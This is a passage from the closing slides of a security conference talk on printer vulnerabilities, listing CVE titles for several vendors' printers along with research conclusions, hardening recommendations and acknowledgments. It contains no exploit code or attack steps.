Request Forgery Countermeasures CVE-2019-13200 Reflected Cross-Site Scripting CVE-2019-13201 Buffer Overflow in LPD Service CVE-2019-13202 Multiple Buffer Overflow in Web Server (3) CVE-2019-13203 Integer Overflow in Web Server CVE-2019-13204 Multiple Buffer Overflow in IPP Service CVE-2019-13205 Broken Access Controls in Web Server CVE-2019-13206 Multiple Buffer Overflow in Web Server (4) Ricoh CVE-2019-14299 No Account Lockout Implemented CVE-2019-14300 Buffer Overflow in HTTP Headers CVE-2019-14301 Information Disclosure Vulnerability in Web Server CVE-2019-14302 Hardware Debug Exposed CVE-2019-14303 Denial of Service with LPD Command CVE-2019-14304 Cross-Site Request Forgery CVE-2019-14305 Multiple Buffer Overflows in Web Application CVE-2019-14306 Broken Access Controls CVE-2019-14307 Denial of Service Setting SNMP Values CVE-2019-14308 Buffer Overflow in LPD Service CVE-2019-14309 FTP Hardcoded Credentials CVE-2019-14310 Buffer Overflow in IPP Service (1) CVE-2019-14311 Buffer Overflow in IPP Service (2)
  • 63. Impact of the Research & Conclusions  Common office devices present in all organizations  Very immature state of security  Largely ignored in most organizations  Large number of critical and high risk issues in 6 of 6 printers tested  Functional PoC Unauthenticated RCE exploits for 4 of them (we ran out of time)  50 CVEs  We stopped searching after a few vulnerabilities… there are probably more  We only looked at a small part of the attack surface… there is a lot more  The first researcher who takes a look will likely hit the jackpot!  Shared code between different products of the same vendors  Huge number of devices affected
  • 64. Recommendations For printer manufacturers:  Security in product development life cycle  Assess your products!  Hardware  Services  Code  Review your vulnerability disclosure procedures For hackers:  Give it a try!  There are vulnerabilities waiting for you  A lot to learn, and a lot of FUN! For organizations:  Start by considering them as threats!  Inventory of all makes, models and firmware versions  Ensure that the firmware is updated as you do for any other asset!  Perform hardening of the printers config, removing unnecessary services, etc.
  • 65. What about Internet? As expected.. there was a large number of these printers connected to Internet! and... Are different manufacturers using the same code?
  • 66. Acknowledgments! The research was performed at NCC Group, giving us the time and resources needed for it. Thanks to all the Madrid Office, Matt Lewis and Phillip Moss for their support, giving us ideas and helping us with the talk. And last but not least… we would like to thank to Álvaro Felipe (@alvaro_fe), who took part on this research during the first days and helped us with great ideas during the exploitation phases.
  • 67. Thank you for suffering us Daniel Romero @daniel_rome Mario Rivas @grifo Achievement Unlocked! Talk at DEF CON!